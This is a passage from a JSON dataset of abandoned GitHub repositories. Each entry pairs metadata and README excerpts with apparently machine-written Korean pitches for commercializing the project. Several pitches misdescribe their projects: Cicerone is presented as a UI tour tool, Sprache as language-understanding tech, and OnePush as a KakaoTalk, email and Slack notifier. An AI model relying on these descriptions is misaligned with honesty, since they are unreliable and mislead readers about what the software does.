쉽게 사용할 수 있게 만든 도구로, 물건의 색깔을 자동으로 인식하는 기술이 필요한 곳이라면 누구나 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **물건 분류 자동화 서비스**: 택배사나 재활용업체가 상품의 색상을 자동으로 구분하는 시스템에 판매","readme_excerpt":"# Adafruit TCS34725 Color Sensor Driver[![Build Status](https://github.com/adafruit/Adafruit_TCS34725/workflows/Arduino%20Library%20CI/badge.svg)](https://github.com/adafruit/Adafruit_TCS34725/actions)[![Documentation](https://github.com/adafruit/ci-arduino/blob/master/assets/doxygen_badge.svg)](http://adafruit.github.io/Adafruit_TCS34725/html/index.html)\n\n<a href=\"https://www.adafruit.com/product/1334\"><img src=\"assets/board.jpg?raw=true\" width=\"500px\"></a>\n\nThis driver is for the Adafruit TCS34725 Breakout.\n\nTested and works great with the Adafruit MCP9808 Breakout Board \n* http://www.adafruit.com/products/1334\n\nThese modules use I2C to communicate, 2 pins are required to  \ninterface\n\nAdafruit invests time and resources providing this open source code, \nplease support Adafruit and open-source hardware by purchasing \nproducts from Adafruit!\n\nWritten by Kevin (KTOWN) Townsend for Adafruit Industries.\nBSD license, check license.txt for more information\nAll text above must be included in","composite_score":0.3095,"license_safety_tag":"unknown"},{"name":"rasbt/stat479-machine-learning-fs18","github_url":"https://github.com/rasbt/stat479-machine-learning-fs18","stars":6,"language":"Jupyter Notebook","license":"unknown","abandonment_months":90,"description":"# rasbt/stat479-machine-learning-fs18 분석\n\n## 왜 보물인가\n대학 교수가 직접 만든 머신러닝 강좌 자료로, 복잡한 데이터 분석 기술을 누구나 이해할 수 있게 정리해놓은 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 데이터 분석 초보자를 위한 유료 강좌로 재구성하여 구독형 서비스 운영\n2. *","readme_excerpt":"# STAT479: Machine Learning (Fall 2018)\n\nInstructor: Sebastian Raschka\n\nLecture material for the Machine Learning course (STAT 479) at University Wisconsin-Madison. For details, please see the course website at http://pages.stat.wisc.edu/~sraschka/teaching/stat479-fs2018/\n\n\n\n**Part I: Introduction**\n\n- [Lecture 1](01_overview): What is Machine Learning? An Overview.\n- [Lecture 2](02_knn): Intro to Supervised Learning: KNN\n\n**Part II: Computational Foundations**\n\n- [Lecture 3](03_python): Using Python, Anaconda, IPython, Jupyter Notebooks\n- [Lecture 4](04_scipython): Scientific Computing with NumPy, SciPy, and Matplotlib\n- [Lecture 5](05_sklearn): Data Preprocessing and Machine Learning with Scikit-Learn\n\n**Part III: Tree-Based Methods**\n\n- [Lecture 6](06_trees): Decision Trees\n- [Lecture 7](07_ensembles): Ensemble Methods\n\n**Part IV: Evaluation**\n\n- [Lecture 8](08_eval-intro): Model Evaluation 1: Introduction to Overfitting and Underfitting\n- [Lecture 9](09_eval-ci): Model Evaluation 2","composite_score":0.3095,"license_safety_tag":"unknown"},{"name":"whoisflynn/OSCP-Exam-Report-Template","github_url":"https://github.com/whoisflynn/OSCP-Exam-Report-Template","stars":5,"language":"","license":"unknown","abandonment_months":61,"description":"# OSCP-Exam-Report-Template 분석\n\n## 왜 보물인가\n보안 자격증 시험을 준비하는 사람들이 시험 결과를 전문적으로 정리할 수 있는 템플릿을 제공하여, 수천 명의 반복적인 문서 작업을 대체할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 보안 자격증 시험 준비 플랫폼에서 자동으로 시험 결과 보고서를 생성해주는 유","readme_excerpt":"# OSCP Report Templates\nThis repo contains my templates for the OSCP Lab and OSCP Exam Reports. The reports are nearly identical, with minor variations between them.\n\nI wanted to share these templates with the community to help alleviate some of the stress people feel when they start their report.\n\n**Notable Edits - Lab Report**\n\n1. Updated version to 3.2\n2. Updated the Table of Contents to reflect the new data flow of the document\n3. Added more information to the High Level Summary\n4. Added a total of 10 machine sections. (Copy and paste these if you are reporting more than the 10 machines required for the lab report)\n5. Updated 3.1 Information Gathering (For each machine, I create a link to the associated machine)\n6. Updated the documentation flow. Each Machine is given its own section. Creates a boot to root walkthrough feel for each machine\n7. Added the Service Enumeration table to each machine section instead of one table for the entire report\n8. Added a header for Nmap scan resul","composite_score":0.3094,"license_safety_tag":"unknown"},{"name":"zeeshanu/learn-regex","github_url":"https://github.com/zeeshanu/learn-regex","stars":5,"language":"","license":"mit","abandonment_months":9,"description":"# learn-regex 상용화 분석\n\n## 왜 보물인가\n텍스트에서 원하는 정보를 자동으로 찾아내는 방법을 배우는 교육 자료로, 데이터 처리가 필요한 모든 업무에 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS**: 이메일/휴대폰번호 자동 검증 기능이 있는 회원가입 서비스\n2. **내부 업무 도구**: 대량의 고객 데이터에서 특정 패턴(예","readme_excerpt":"<p align=\"center\">\n    <br/>\n    <a href=\"https://github.com/ziishaned/learn-regex\">\t\n        <img src=\"https://i.imgur.com/bYwl7Vf.png\" alt=\"Learn Regex\">\n    </a>\n</p>\n\n## Translations:\n\n* [English](README.md)\n* [German](translations/README-de.md)\n* [Español](translations/README-es.md)\n* [Français](translations/README-fr.md)\n* [Português do Brasil](translations/README-pt_BR.md)\n* [中文版](translations/README-cn.md)\n* [日本語](translations/README-ja.md)\n* [한국어](translations/README-ko.md)\n* [Turkish](translations/README-tr.md)\n* [Greek](translations/README-gr.md)\n* [Magyar](translations/README-hu.md)\n* [Polish](translations/README-pl.md)\n* [Русский](translations/README-ru.md)\n* [Tiếng Việt](translations/README-vn.md)\n* [Bahasa Indonesia](translations/README-id.md)\n* [فارسی](translations/README-fa.md)\n* [עברית](translations/README-he.md)\n\n\n## What is Regular Expression?\n\n<p>\n    <a href=\"https://gum.co/learn-regex\">\n        <img src=\"https://img.shields.io/badge/-Download%20PDF%20-0a0a0a.svg?","composite_score":0.3093,"license_safety_tag":"safe"},{"name":"linxid/Machine_Learning_Study_Path","github_url":"https://github.com/linxid/Machine_Learning_Study_Path","stars":5,"language":"Python","license":"unknown","abandonment_months":44,"description":"# Machine_Learning_Study_Path 분석\n\n## 왜 보물인가\n인공지능을 배우고 싶어 하는 초보자들을 위해 어디서부터 시작해야 할지 정리해놓은 학습 로드맵으로, 혼란스러운 학습 여정을 명확한 방향으로 안내합니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 인공지능 입문 과정의 커리큘럼 구성 및 학습자 맞춤형 경로 제시\n2.","readme_excerpt":"从入门到进阶，所用到机器学习资料，包括书、视频、源码。\n\n# 1.视频：\n\n## 1.1 吴恩达老师机器学习课程： \n* [Coursera](https://www.coursera.org/learn/machine-learning)\n  \n* [网易云课堂](http://study.163.com/course/introduction/1004570029.htm?courseId=1004570029)  \n* [英文笔记](https://github.com/linxid/Machine_Learning_Study_Path/tree/master/%E7%AC%94%E8%AE%B0/%E5%90%B4%E6%81%A9%E8%BE%BE%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0)   \n* [中文笔记、字幕](https://github.com/fengdu78/Coursera-ML-AndrewNg-Notes)  \n\n## 1.2 吴恩达 深度学习课程 \n* [Coursera](https://www.coursera.org/specializations/deep-learning)\n* [网易云课堂](http://mooc.study.163.com/smartSpec/detail/1001319001.htm) \n* [笔记](http://www.ai-start.com/dl2017/)\n\n## 1.3 斯坦福CS231n:Convolutional Neural Networks for Visual Recognition \n* [官网](http://cs231n.stanford.edu/)  \n* [网易云课堂](http://study.163.com/course/introduction/1003223001.hm)\n\n## 1.4 fast.ai  \n* [官网](http://www.fast.ai/)  \n* [Part1:Practical Deep Learning For Coders](http://course.fast.ai/)  \n* [Part2: Cutting Edge Deep Learning For Co","composite_score":0.3093,"license_safety_tag":"unknown"},{"name":"ciar4n/imagehover.css","github_url":"https://github.com/ciar4n/imagehover.css","stars":5,"language":"HTML","license":"mit","abandonment_months":47,"description":"# imagehover.css 프로젝트 분석\n\n## 왜 보물인가\n웹사이트의 이미지에 마우스를 올렸을 때 나타나는 재미있는 애니메이션 효과를 간단하게 적용할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **포트폴리오 웹사이트**: 디자이너나 사진작가의 작품 전시 사이트에 시각적 효과를 더해 방문자의 관심을 끌 수 있습니다.\n- **전자상거래 플랫폼**","readme_excerpt":"# imagehover.css\n*A Scaleable & Light Image Hover CSS Library*\n\nImagehover.css is a lovingly crafted CSS library allowing you to easily implement scaleable image hover effects. Choose from over 40 hover effect classes from a CSS library weighing in at a minified size of only 19KB. \n\n[Check out all the hover effects here!](http://www.imagehover.io/)\n\n## NPM\n\n  ```\n  npm install imagehover.css\n  ```\n  \n## CDN\n  ```\n  https://cdnjs.cloudflare.com/ajax/libs/imagehover.css/2.0.0/css/imagehover.min.css\n  ```\n\n## Basic Usage\n1. Include the stylesheet on your document's `<head>`\n\n  ```html\n  <head>\n    <link rel=\"stylesheet\" href=\"css/imagehover.min.css\">\n  </head>\n  ```\n2. Place the following markup in to your HTML document\n\n  ```html\n  <figure class=\"imghvr-fade\">\n    <img src=\"#\">\n    <figcaption>\n      // Hover Content\n    </figcaption>\n  </figure>\n  ```\n\n3. Edit the URL to your image and add your hover content. Then simply set the imagehover.css class of your choice to the containing figu","composite_score":0.3093,"license_safety_tag":"safe"},{"name":"rxlabz/panache","github_url":"https://github.com/rxlabz/panache","stars":7,"language":"Dart","license":"unknown","abandonment_months":62,"description":"# Panache 저장소 분석\n\n## 왜 보물인가\n사용자 인터페이스의 시각적 디자인을 빠르고 쉽게 만들어주는 도구로, 웹사이트나 앱을 보기 좋게 꾸미는 데 드는 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1. SaaS 서비스:** 기업용 소프트웨어 회사들이 자신의 제품 대시보드와 관리 화면을 빠르게 개발할 때 사용\n**2. 내부 업무 도","readme_excerpt":"# 🎨 Panache\n\nA [Flutter](https://flutter.io) [Material Theme](https://docs.flutter.io/flutter/material/ThemeData-class.html) editor. \n\nPanache helps you to create beautiful [Material](http://material.io) themes for your Flutter applications.\n\nCustomize widgets colors and shapes, and download your `theme.dart` file.\n\n## :earth_americas: [Try Panache in your browser](https://rxlabz.github.io/panache)\n\n![home](docs/assets/home.png)\n\n## Getting Started\n\nTo apply a theme to whole application \n- add the generated theme file to your project/lib \n- set the theme property to the generated theme (`myTheme`) in your main file\n\n```dart\n// ...\n\nMaterialApp( theme: myTheme , home: Home() );\n\n// ...\n```\n \n- [Using theme in Flutter](https://flutter.dev/docs/cookbook/design/themes)\n\n## :coffee: Support this project\n\n[![Buy Me A Coffee](https://bmc-cdn.nyc3.digitaloceanspaces.com/BMC-button-images/custom_images/orange_img.png)](https://www.buymeacoffee.com/6NHRAj4P5)\n\n## 🍿 Videos\n\n- [Beyond Mobile: Mate","composite_score":0.3093,"license_safety_tag":"unknown"},{"name":"loklak/loklak_server","github_url":"https://github.com/loklak/loklak_server","stars":12,"language":"Java","license":"lgpl-2.1","abandonment_months":44,"description":"# loklak_server 상용화 분석\n\n## 왜 보물인가\n소셜 미디어의 방대한 정보를 수집하고 분석할 수 있는 오픈소스 플랫폼으로, 기업이 시장 트렌드와 고객 의견을 실시간으로 파악하는 데 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **소셜 미디어 분석 SaaS**: 기업의 브랜드 평판 모니터링과 고객 피드백 자동 수집 서비스\n- **마케팅 인","readme_excerpt":"# loklak\n[![Join the chat at https://gitter.im/loklak/loklak](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/loklak/loklak)\n[![Docker Pulls](https://img.shields.io/docker/pulls/loklak/loklak_server.svg?maxAge=2592000?style=flat-square)](https://hub.docker.com/r/mariobehling/loklak/)\n[![Percentage of issues still open](http://isitmaintained.com/badge/open/loklak/loklak_server.svg)](http://isitmaintained.com/project/loklak/loklak_server \"Percentage of issues still open\")\n[![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/loklak/loklak_server.svg)](http://isitmaintained.com/project/loklak/loklak_server \"Average time to resolve an issue\")\n[![Twitter](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Wow%20Check%20Loklak%20on%20@gitHub%20@loklak_app%20@loklak_:%20https://github.com/loklak/loklak_server%20&url=%5Bobject%20Object%5D)\n[![Twitter Follow](https://img.shields.io/twitter/follow/lok","composite_score":0.3092,"license_safety_tag":"restricted"},{"name":"souporserious/react-popper","github_url":"https://github.com/souporserious/react-popper","stars":5,"language":"JavaScript","license":"mit","abandonment_months":25,"description":"# react-popper 상용화 분석\n\n## 왜 보물인가\n웹사이트에서 마우스를 올렸을 때 나타나는 설명 풍선이나 드롭다운 메뉴 같은 '떠다니는 UI 요소'를 만드는 표준 도구로, 수많은 웹서비스가 필수적으로 사용하는 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 협업 도구나 프로젝트 관리 앱에서 마우스 호버 시 사용자 정보 ","readme_excerpt":"# React Popper\n\n[![Unit Tests](https://github.com/popperjs/react-popper/workflows/Unit%20Tests/badge.svg)](https://github.com/popperjs/react-popper/actions?query=workflow%3A%22Unit+Tests%22)\n[![npm version](https://img.shields.io/npm/v/react-popper.svg)](https://www.npmjs.com/package/react-popper)\n[![npm downloads](https://img.shields.io/npm/dm/react-popper.svg)](https://www.npmjs.com/package/react-popper)\n[![Dependency Status](https://david-dm.org/souporserious/react-popper.svg)](https://david-dm.org/souporserious/react-popper)\n[![code style: prettier](https://img.shields.io/badge/code_style-prettier-ff69b4.svg)](https://github.com/prettier/prettier)\n[![Get support or discuss](https://img.shields.io/badge/chat-on_spectrum-6833F9.svg?logo=data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyBpZD0iTGl2ZWxsb18xIiBkYXRhLW5hbWU9IkxpdmVsbG8gMSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB2aWV3Qm94PSIwIDAgMTAgOCI%2BPGRlZnM%2BPHN0eWxlPi5jbHMtMXtmaWxsOiNmZmY7fTwvc3R5bGU%2BPC9kZWZzPjx0aXRsZT5zcGVjdHJ1b","composite_score":0.3092,"license_safety_tag":"safe"},{"name":"fossasia/gci15.fossasia.org","github_url":"https://github.com/fossasia/gci15.fossasia.org","stars":11,"language":"HTML","license":"gpl-2.0","abandonment_months":44,"description":"# fossasia/gci15.fossasia.org 분석\n\n## 왜 보물인가\nFOSSASIA(오픈소스 아시아 커뮤니티)의 공식 교육 프로그램 웹사이트로, 아시아 지역 청소년 개발자 양성이라는 사회적 영향력이 있는 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼 SaaS**: 대학이나 교육기관이 학생 경진대회 관리 시스템으로 구독 서비스화\n","readme_excerpt":"# FOSSASIA GCI Site 2015/16\n\n[![Build Status](https://travis-ci.org/fossasia/gci15.fossasia.org.svg)](https://travis-ci.org/fossasia/gci15.fossasia.org)\n\n\n## Run this website on Github\nFork this repo, and it should be on `http://<username>.github.io/gci15.fossasia.org` now.\n\n## Running the website on Local Machine\n\nThere are three steps involved:\n\n**1. Clone Repo**\n\nFirst of all you need to clone the repo. You can easily do this by running any one of the below listed commands:\n\n- `git clone https://github.com/fossasia/gci15.fossasia.org.git`\n\nor own fork version\n\n- `git clone https://github.com/<username>/gci15.fossasia.org.git`\n\n**2. Install Jekyll**\n\n```\ngem install bundler\ngem install github-pages\n```\n\n*Use sudo if there is any permission issue*\n\n**3. Running website**\n\n```\ncd gci15.fossasia.org\njekyll serve\n```   \n\nNow you can open the website by opening any one of the following links:\n\n- `http://0.0.0.0:4000/` \n- `http://localhost:4000/`\n\n## Useful Git Tricks\n  see [GIT.md](https:","composite_score":0.3091,"license_safety_tag":"restricted"},{"name":"thejameskyle/react-loadable","github_url":"https://github.com/thejameskyle/react-loadable","stars":12,"language":"JavaScript","license":"mit","abandonment_months":23,"description":"# React Loadable 상용화 분석\n\n## 왜 보물인가\n웹사이트가 느려지는 문제를 자동으로 해결해주는 오픈소스 도구로, 이를 기반으로 한 성능 최적화 서비스를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹사이트 속도 개선을 자동으로 해주는 클라우드 기반 성능 최적화 플랫폼\n- **내부 업무 도구**: 대규모 웹 애플","readme_excerpt":"![React Loadable](http://thejameskyle.com/img/react-loadable-header.png)\n\n> A higher order component for loading components with dynamic imports.\n\n## Install\n\n```sh\nyarn add react-loadable\n```\n\n## Example\n\n```js\nimport Loadable from 'react-loadable';\nimport Loading from './my-loading-component';\n\nconst LoadableComponent = Loadable({\n  loader: () => import('./my-component'),\n  loading: Loading,\n});\n\nexport default class App extends React.Component {\n  render() {\n    return <LoadableComponent/>;\n  }\n}\n```\n\n## Happy Customers:\n\n- [\"I'm obsessed with this right now: CRA with React Router v4 and react-loadable. Free code splitting, this is so easy.\"](https://twitter.com/matzatorski/status/872059865350406144)\n- [\"Oh hey - using loadable component I knocked 13K off my initial load. Easy win!\"](https://twitter.com/AdamRackis/status/846593080992153600)\n- [\"Had a look and its awesome. shaved like 50kb off our main bundle.\"](https://github.com/quran/quran.com-frontend/pull/701#issuecomment-287908","composite_score":0.309,"license_safety_tag":"safe"},{"name":"hyperoslo/Hue","github_url":"https://github.com/hyperoslo/Hue","stars":6,"language":"Swift","license":"NOASSERTION","abandonment_months":33,"description":"# Hue 저장소 분석 보고서\n\n## 왜 보물인가\n색상(Hue) 관련 기능을 제공하는 소프트웨어로, 디자인이나 시각화가 필요한 다양한 애플리케이션에 활용될 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 그래픽 디자인 도구에서 사용자가 색상을 선택하고 관리할 수 있는 기능 제공\n2. **내부 업무 도구**: 기업의 브","readme_excerpt":"![Hue](https://github.com/hyperoslo/Hue/blob/master/Images/cover.png)\n\nHue is the all-in-one coloring utility that you'll ever need.\n\n[![Version](https://img.shields.io/cocoapods/v/Hue.svg?style=flat)](http://cocoadocs.org/docsets/Hue)\n[![Carthage Compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![License](https://img.shields.io/cocoapods/l/Hue.svg?style=flat)](http://cocoadocs.org/docsets/Hue)\n[![Platform](https://img.shields.io/cocoapods/p/Hue.svg?style=flat)](http://cocoadocs.org/docsets/Hue)\n![Swift](https://img.shields.io/badge/%20in-swift%205.0-orange.svg)\n\n## Usage\n\n#### Hex\n<img src=\"https://raw.githubusercontent.com/hyperoslo/Hue/master/Images/icon_v3.png\" alt=\"Hue Icon\" align=\"right\" />You can easily use hex colors with the `init(hex:)` convenience initializer on `UIColor`. It supports the following hex formats `#ffffff`, `ffffff`, `#fff`, `fff`\n```swift\nlet white = UIColor(hex: \"#ffffff\")\nlet black = ","composite_score":0.309,"license_safety_tag":"unknown"},{"name":"pengyuantao/OnePush","github_url":"https://github.com/pengyuantao/OnePush","stars":5,"language":"Java","license":"unknown","abandonment_months":95,"description":"# OnePush 상용화 분석 보고서\n\n## 왜 보물인가\n여러 알림 서비스(카톡, 이메일, 슬랙 등)를 하나의 통합 플랫폼에서 관리할 수 있어, 개발자와 기업의 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 자신의 웹 서비스에 '통합 알림 기능' 추가 기능으로 제공하여 고객 유지율 향상\n- **내부 업무 도구*","readme_excerpt":"## 目前OnePush在Android8.0上不兼容的问题，OnePush暂时不进行维护了，建议大家使用友盟的聚合推送，上面已经有各大厂商的推送。\n\n\n## 消息推送用OnePush，就够了！\n\n|模块|one-push-core|one-push-huawei|one-push-xiaomi|one-push-meizu|one-push-huawei-hms|\n|-------|-------|-------|-------|-------|-------|\n|lastVersion|![](https://api.bintray.com/packages/pengyuantao/maven/one-push-core/images/download.svg)|![](https://api.bintray.com/packages/pengyuantao/maven/one-push-huawei/images/download.svg)|![](https://api.bintray.com/packages/pengyuantao/maven/one-push-xiaomi/images/download.svg)|![](https://api.bintray.com/packages/pengyuantao/maven/one-push-meizu/images/download.svg)|![](https://api.bintray.com/packages/pengyuantao/maven/one-push-huawei-hms/images/download.svg)|\n\n|模块|one-push-umeng|one-push-getui|one-push-jpush|\n|-------|-------|------|------|\n|lastVersion|![](https://api.bintray.com/packages/pengyuantao/maven/one-push-umeng/images/download.svg)|![](https://api.bintray.com/packages/pengyuantao/maven/one-push-getui/images/download.svg)|![](https://","composite_score":0.3089,"license_safety_tag":"unknown"},{"name":"ZhongXiaoHong/superFileView","github_url":"https://github.com/ZhongXiaoHong/superFileView","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":102,"description":"# superFileView 상용화 분석\n\n## 왜 보물인가\n다양한 파일 형식을 웹에서 바로 열어볼 수 있는 기술로, 파일 공유·협업 플랫폼의 핵심 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 저장소 서비스**: Google Drive처럼 PDF, 이미지, 문서를 미리보기 없이 다운로드하지 않고 바로 확인하는 기능\n2. **기업 문서 관","readme_excerpt":"## 交流群 540686217\n\n## 说明\n\n> * 基于腾讯浏览服务，支持多种文件格式，例如doc、excel、ppt、excel、pdf等格式；\n> * 支持展示网络文件\n> * 支持测试本demo之前先把test文件夹里的文件复制到手机存储，方便测试，路径如下：\n![这里写图片描述](https://github.com/ZhongXiaoHong/superFileView/blob/master/path.png?raw=true)\n\n## TBS服务接入\n\n参考腾讯TBS官网，地址：https://x5.tencent.com/tbs/guide/sdkInit.html\n\n## 效果图\n![这里写图片描述](https://github.com/ZhongXiaoHong/superFileView/blob/master/record.gif?raw=true)\n\n## 常见问题\n- no suport by\n\n出现这个错误提示的原因，首先可能是手机上没有Tbs内核，如果有tbs内核，则可能是内核正在初始化安装，还处于冷启动阶段，这个时候内核还不能使用，打开文件会出现这个错误，可以使用可以按如下方式确定内核是否成功加载并且可用：\n方法1：\n```\n  QbSdk.initX5Environment(this, new QbSdk.PreInitCallback() {\n            @Override\n            public void onCoreInitFinished() {\n\n            }\n\n            @Override\n            public void onViewInitFinished(boolean b) {\n              //这里被回调，并且b=true说明内核初始化并可以使用\n              //如果b=false,内核会尝试安装，你可以通过下面监听接口获知\n            }\n        });\n\n       QbSdk.setTbsListener(new TbsListener() {\n           @Override\n           public void onDownloadFinish(int i)","composite_score":0.3088,"license_safety_tag":"safe"},{"name":"DmitryUlyanov/texture_nets","github_url":"https://github.com/DmitryUlyanov/texture_nets","stars":5,"language":"Lua","license":"apache-2.0","abandonment_months":102,"description":"# Texture Nets 상용화 분석\n\n## 왜 보물인가\n사진이나 그림의 질감(텍스처)을 자동으로 분석하고 변환할 수 있는 AI 기술로, 디자인·미디어 업계에서 수작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 이미지 편집 SaaS**\n브라우저에서 사진의 재질감을 클릭 한 번에 변경하는 웹 서비스 (예: 나무→금속, 천→가죽)","readme_excerpt":"# Texture Networks + Instance normalization: Feed-forward Synthesis of Textures and Stylized Images\n\nIn the paper [Texture Networks: Feed-forward Synthesis of Textures and Stylized Images](http://arxiv.org/abs/1603.03417) we describe a faster way to generate textures and stylize images. It requires learning a feedforward generator with a loss function proposed by [Gatys et al.](http://arxiv.org/abs/1505.07376). When the model is trained, a texture sample or stylized image of any size can be generated instantly.\n\n[Improved Texture Networks: Maximizing Quality and Diversity in Feed-forward Stylization and Texture Synthesis](https://arxiv.org/abs/1701.02096) presents a better architectural design for the generator network. By switching `batch_norm` to `Instance Norm` we facilitate the learning process resulting in much better quality.\n\n\n\nThis also implements the stylization part from [Perceptual Losses for Real-Time Style Transfer and Super-Resolution](https://arxiv.org/abs/1603.08155).\n\n","composite_score":0.3087,"license_safety_tag":"safe"},{"name":"sprache/Sprache","github_url":"https://github.com/sprache/Sprache","stars":8,"language":"C#","license":"mit","abandonment_months":26,"description":"# Sprache 저장소 분석\n\n## 왜 보물인가\n텍스트를 자동으로 분석하고 의미를 이해하는 기술로, 챗봇이나 검색 엔진 같은 똑똑한 프로그램을 만드는 데 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 피드백을 자동으로 분류하는 감정 분석 웹서비스\n2. **내부 업무 도구**: 회사 이메일에서 자동으로 핵심 내용을 추출","readme_excerpt":"# Sprache [![Sprache tag on Stack Overflow](https://img.shields.io/badge/stackoverflow-sprache-orange.svg)](http://stackoverflow.com/questions/tagged/sprache) [![Join the chat at https://gitter.im/sprache/Sprache](https://badges.gitter.im/sprache/Sprache.svg)](https://gitter.im/sprache/Sprache?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![NuGet](https://img.shields.io/nuget/v/Sprache.svg)](https://nuget.org/packages/Sprache) [![Build status](https://ci.appveyor.com/api/projects/status/xrn2d7b9crqj8l4a?svg=true)](https://ci.appveyor.com/project/Sprache/sprache)\n\nSprache is a simple, lightweight library for constructing parsers directly in C# code.\n\nIt doesn't compete with \"industrial strength\" language workbenches - it fits somewhere in between regular expressions and a full-featured toolset like [ANTLR](http://antlr.org).\n\n![Sprache](https://avatars1.githubusercontent.com/u/1999078?v=3&s=200)\n\n### Usage\n\nUnlike most parser-building frameworks, you use Sp","composite_score":0.3087,"license_safety_tag":"safe"},{"name":"NVIDIA/partialconv","github_url":"https://github.com/NVIDIA/partialconv","stars":8,"language":"Python","license":"NOASSERTION","abandonment_months":37,"description":"# NVIDIA/partialconv 분석 보고서\n\n## 왜 보물인가\nNVIDIA에서 만든 이 기술은 **이미지 처리 속도를 획기적으로 빠르게** 하면서도 품질을 유지하는 방식으로, 실시간 영상 처리가 필요한 여러 산업에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 사진 편집/필터 서비스에 탑재하여 사용자가 즉시","readme_excerpt":"\r\n# Partial Convolution Layer for Padding and Image Inpainting\r\n### [Padding Paper](https://arxiv.org/pdf/1811.11718.pdf) | [Inpainting Paper](https://arxiv.org/abs/1804.07723) | [Inpainting YouTube Video](https://www.youtube.com/watch?v=gg0F5JjKmhA) | [Online Inpainting Demo](https://www.nvidia.com/research/inpainting/)\r\n\r\nThis is the PyTorch implementation of partial convolution layer. It can serve as a new padding scheme; it can also be used for image inpainting. <br><br>\r\n\r\n\r\n[Partial Convolution based Padding](https://arxiv.org/pdf/1811.11718.pdf) <br>\r\n[Guilin Liu](https://liuguilin1225.github.io/), [Kevin J. Shih](http://web.engr.illinois.edu/~kjshih2/), [Ting-Chun Wang](https://tcwang0509.github.io/), [Fitsum A. Reda](https://scholar.google.com/citations?user=quZ_qLYAAAAJ&hl=en), [Karan Sapra](http://cecas.clemson.edu/~ksapra/), [Zhiding Yu](https://chrisding.github.io/), Andrew Tao, [Bryan Catanzaro](http://catanzaro.name/) <br>\r\nNVIDIA Corporation <br>\r\nTechnical Report (**Te","composite_score":0.3086,"license_safety_tag":"unknown"},{"name":"mozilla-neutrino/neutrino-dev","github_url":"https://github.com/mozilla-neutrino/neutrino-dev","stars":6,"language":"JavaScript","license":"mpl-2.0","abandonment_months":28,"description":"# Neutrino Dev 상용화 분석\n\n## 왜 보물인가\nMozilla의 검증된 기술을 기반으로 개발 생산성을 높일 수 있는 도구로, 기존 개발 도구 시장에서 입지를 다질 수 있는 잠재력이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발팀 협업 SaaS**: 개발자들이 코드를 더 빠르게 작성하고 검토하는 웹 기반 플랫폼으로 월 구독료 수집\n2. **기","readme_excerpt":"<h1><p align=\"center\"><a href=\"https://neutrinojs.org\"><img src=\"https://raw.githubusercontent.com/neutrinojs/neutrino/master/docs/assets/logo.png\" height=\"150\" width=\"150\"></a></p></h1>\n\n### Create and build modern JavaScript applications with zero initial configuration\n\n#### Neutrino combines the power of webpack with the simplicity of presets.\n\n[![NPM version][npm-image]][npm-url] [![NPM downloads][npm-downloads]][npm-url]\n[![CI Status][ci-image]][ci-url] [![Netlify Status][netlify-image]][netlify-url]\n\n[https://github.com/neutrinojs/neutrino](https://github.com/neutrinojs/neutrino)\n\n---\n\nNeutrino is a companion tool which lets you build web and Node.js applications\nwith shared presets or configurations. It intends to make the process of\ninitializing and building projects much simpler by providing minimal development\ndependencies.\n\nNeutrino uses webpack to build both web and Node.js projects by providing\ncomplete build presets which can be shared across targets and projects. You can","composite_score":0.3085,"license_safety_tag":"unknown"},{"name":"terrakok/Cicerone","github_url":"https://github.com/terrakok/Cicerone","stars":5,"language":"Kotlin","license":"NOASSERTION","abandonment_months":37,"description":"# Cicerone 저장소 분석\n\n## 왜 보물인가\n앱이나 웹사이트에서 사용자에게 기능을 설명해주는 투어 기능을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 새로운 고객이 복잡한 소프트웨어를 처음 사용할 때 단계별로 가이드해주는 온보딩 기능\n**2. 내부 업무 도구**: 회사 직원들이 새로운 시스템을 배울 때 ","readme_excerpt":"# Cicerone\n[![Maven Central](https://img.shields.io/maven-central/v/com.github.terrakok/cicerone)](https://repo1.maven.org/maven2/com/github/terrakok/cicerone/)\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)  \n\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-Cicerone-green.svg?style=true)](https://android-arsenal.com/details/1/4700)\n[![Android Weekly](https://img.shields.io/badge/Android%20Weekly-250-green.svg)](http://androidweekly.net/issues/issue-250)\n[![Android Weekly](https://img.shields.io/badge/Android%20Weekly-271-green.svg)](http://androidweekly.net/issues/issue-271)  \n\n<table>\n    <tr>\n        <td>\n            <img src=\"https://github.com/terrakok/Cicerone/raw/master/media/navigation.gif\" 